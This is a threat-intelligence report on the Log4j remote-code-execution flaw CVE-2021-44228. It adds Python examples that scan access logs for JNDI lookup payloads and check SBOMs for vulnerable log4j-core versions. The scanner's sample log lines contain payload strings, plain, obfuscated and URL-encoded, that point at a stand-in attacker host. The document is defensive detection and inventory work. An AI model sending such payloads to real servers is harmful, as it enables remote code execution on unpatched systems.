THREAT INTELLIGENCE REPORT
Log4j Java Logging
Critical Vulnerability Results in
Remote Code Execution (RCE)
Fortress Information Security is working closely with government and commercial clients to assist in mitigating CVE-2021-44228, the recently disclosed vulnerability in the popular Java logging library Log4j. So far we have identified over 250,000 open-source projects that reference Log4j.
Log4j is developed by the Apache Software Foundation and is used in thousands of applications, including Apache Struts, and the vulnerability impacts Cloudflare, Minecraft, Twitter, Apple and many of the largest technology companies in the world. It is being actively exploited in the wild, with public exploit code available. The flaw is in the message lookup feature of Log4j 2: when a logged string contains a lookup of the form ${jndi:ldap://host/path}, Log4j resolves it through the Java Naming and Directory Interface (JNDI), the standard Java API for querying naming and directory services such as LDAP and RMI. An attacker who controls that host can answer the lookup with a reference that causes the application to load and execute attacker-supplied code. Because the payload only has to reach a logged field, any attacker-controlled input that ends up in a log line (HTTP headers such as User-Agent, usernames, form fields, URL parameters) is a potential entry point. Affected versions are Log4j 2.0-beta9 through 2.14.1; the Apache project fixed this CVE in 2.15.0 (with 2.12.2 and 2.3.1 as backports for Java 7 and Java 6), and later releases disable JNDI lookups by default. Log4j 1.x does not implement message lookups and is not affected by CVE-2021-44228, although it is end-of-life and has its own unpatched issues.
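As an added example (not part of the original report and not Fortress tooling), the following Python scans web-server access-log lines for the JNDI lookup strings used to trigger CVE-2021-44228. It resolves the nested lower/upper and default-value lookups that attackers use to evade naive matching on the literal text "${jndi:", and URL-decodes each line first because web servers log the request path in encoded form. The log lines, the host attacker.example and the obfuscated payload forms are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real system). Lines 2-5 carry
# CVE-2021-44228 lookup strings, including the lower-case and default-value
# obfuscations and a URL-encoded form; lines 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: a body that contains no further '$', '{' or '}'.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Lookup body that is already the JNDI payload we want to surface.
_JNDI_BODY = re.compile(r"\s*jndi\s*:", re.IGNORECASE)
# Final detection pattern applied to the normalized line.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Collapse one innermost lookup the way Log4j's string substitution does for
    the obfuscation tricks seen in the wild. Unknown lookups keep their literal body."""
    if ":-" in body:                      # ${x:-default} and ${::-j} yield the default text
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return rest.lower()
    if sep and prefix.strip().lower() == "upper":
        return rest.upper()
    return body


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out until a ${jndi:...} surfaces or
    nothing changes. max_rounds bounds the work on adversarial deeply nested input."""
    def sub(m):
        body = m.group(1)
        if _JNDI_BODY.match(body):       # keep the payload intact for the final match
            return m.group(0)
        return _resolve(body)

    for _ in range(max_rounds):
        new = _LOOKUP.sub(sub, text)
        if new == text:
            return text
        text = new
    return text


def scan_log_lines(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(unquote(line))
        if JNDI_LOOKUP.search(norm):
            hits.append((n, norm))
    return hits


if __name__ == "__main__":
    for n, line in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

Matching on the normalized text rather than the raw line is the point: the raw forms on lines 3 and 4 contain no "jndi" substring at all, yet Log4j resolves them to the same payload as line 2. The normalizer only implements the lookup types commonly abused for obfuscation, so treat a miss as absence of evidence, not proof of a clean log.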
This is a critical vulnerability that results in Remote Code Execution (RCE). Fortress has validated that the vulnerable Log4j versions are easily identified by automated methods within a File Integrity Assurance (FIA) solution. Software Bills of Materials (SBOMs) are an effective means of determining which components are impacted by a newly discovered vulnerability: when a product's SBOM records each dependency with its exact version, the affected component can be matched against the vulnerable version range without waiting for vendor notices or scanning every deployed host. Two checks matter in practice: match on the log4j-core artifact specifically (log4j-api alone does not carry the vulnerable lookup code), and inspect nested or bundled components, since a vulnerable log4j-core is often repackaged inside another JAR and is missed by an SBOM that lists only top-level dependencies. Below is an example SBOM highlighting the affected version of Log4j in Keycloak, an open-source identity and access management solution.
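Before the report's SBOM excerpt, here is an added example (not from the report, and not Fortress's FIA tooling) of the matching step in Python: it walks a CycloneDX JSON SBOM, including nested components, and flags every log4j-core whose version falls in the CVE-2021-44228 range. The SBOM is constructed for the example and does not describe any real Keycloak release; the com.example "shaded-bundle" artifact is hypothetical, and the component versions are chosen to exercise the version comparison, including the 2.0-beta9 lower bound and the 2.3.1 / 2.12.2 backport releases.

```python
import json
import re

# Constructed CycloneDX 1.4 JSON SBOM for the example. The component list is
# illustrative only and does not describe any real Keycloak release; com.example
# "shaded-bundle" is a hypothetical artifact that repackages log4j-core.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"type": "application", "name": "keycloak"}},
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
         "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
         "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
        {"type": "library", "group": "log4j", "name": "log4j", "version": "1.2.17",
         "purl": "pkg:maven/log4j/log4j@1.2.17"},
        {"type": "library", "group": "com.example", "name": "shaded-bundle", "version": "1.0",
         "purl": "pkg:maven/com.example/shaded-bundle@1.0",
         "components": [
             {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
              "version": "2.12.1",
              "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.12.1"}]},
    ],
})

_PRE_RELEASE = {"alpha": 0, "beta": 1, "rc": 2}


def version_key(version: str) -> tuple:
    """Map a Log4j version string to a comparable tuple. '2.0-beta9' sorts before
    '2.0', which sorts before '2.14.1'; the numeric core is padded to three parts."""
    core, _, pre = version.partition("-")
    nums = tuple(int(x) for x in re.findall(r"\d+", core))[:3]
    nums += (0,) * (3 - len(nums))
    if pre:
        m = re.match(r"([A-Za-z]*)(\d*)", pre)
        label = _PRE_RELEASE.get(m.group(1).lower(), 1)   # unknown label treated like beta
        return nums + (0, label, int(m.group(2) or 0))
    return nums + (1, 0, 0)                              # final release


def is_affected_by_cve_2021_44228(group: str, name: str, version: str) -> bool:
    """Affected range per the Apache advisory: log4j-core 2.0-beta9 through 2.14.1,
    excluding the 2.3.1 (Java 6) and 2.12.2 (Java 7) backport fixes and their
    successors. log4j-api alone and Log4j 1.x do not carry the vulnerable lookup."""
    if (group, name) != ("org.apache.logging.log4j", "log4j-core"):
        return False
    key = version_key(version)
    if not version_key("2.0-beta9") <= key <= version_key("2.14.1"):
        return False
    major, minor, patch = key[:3]
    if (major, minor) == (2, 3) and patch >= 1:
        return False
    if (major, minor) == (2, 12) and patch >= 2:
        return False
    return True


def find_affected_components(sbom_json: str) -> list:
    """Walk the SBOM, including nested components, and return the purl (or
    group:name:version) of every log4j-core in the affected range."""
    def walk(components):
        for c in components:
            group, name, version = c.get("group", ""), c.get("name", ""), c.get("version", "")
            if is_affected_by_cve_2021_44228(group, name, version):
                yield c.get("purl") or f"{group}:{name}:{version}"
            yield from walk(c.get("components", []))
    return list(walk(json.loads(sbom_json).get("components", [])))


if __name__ == "__main__":
    for purl in find_affected_components(SAMPLE_SBOM):
        print("AFFECTED:", purl)
```

The range check is deliberately explicit about the backport branches: a naive "less than 2.15.0" test would flag the patched 2.3.1 and 2.12.2 releases as vulnerable, while a naive "2.14.1 or lower" test without the beta handling would miss 2.0-beta9. The recursive walk is what catches the log4j-core hidden inside the bundled artifact.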